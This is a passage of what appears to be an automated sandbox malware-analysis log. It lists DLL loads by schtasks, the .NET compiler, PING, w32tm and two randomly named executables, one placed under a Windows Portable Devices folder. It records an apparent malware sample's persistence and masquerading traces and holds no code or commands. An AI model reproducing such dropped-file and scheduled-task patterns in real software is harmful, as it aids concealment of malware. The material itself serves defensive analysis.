Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: pcacli.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: sfc_os.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: dlnashext.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wpdshext.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Section loaded: profapi.dll
